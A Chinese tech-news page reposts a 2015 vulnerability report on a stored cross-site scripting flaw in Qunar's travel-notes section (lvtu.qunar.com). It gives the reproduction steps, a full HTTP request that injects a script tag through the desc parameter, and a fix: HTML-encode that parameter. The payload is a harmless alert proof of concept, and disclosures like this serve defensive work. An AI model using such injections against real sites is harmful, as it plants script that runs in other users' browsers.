精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

去哪儿一处存储型XSS漏洞

2015-01-20 11:45 来源: 编辑:admin
XSS漏洞 在旅途频道, 1、发表一篇游记 2、添加一批图片 3、在图片下方插入文本 4、截包修改,desc参数存在问题。如下:   GET /mobile_ugc/web/editMiniPic.htm?picId=80371&desc=<script>if(location.hash!%3D"")alert(location.hash)</script>&random=1348498825316 HTTP/1.1 Host: lvtu.qunar.com Proxy-Connection: Keep-Alive Cookie: ……     访问该地址看效果 http://lvtu.qunar.com/mobile_ugc/web/album.htm?albumId=4228#aaa           修复方案:

对desc参数进行html编码  
标签
你喜欢的文章
返回首页
扫描微信
返回顶部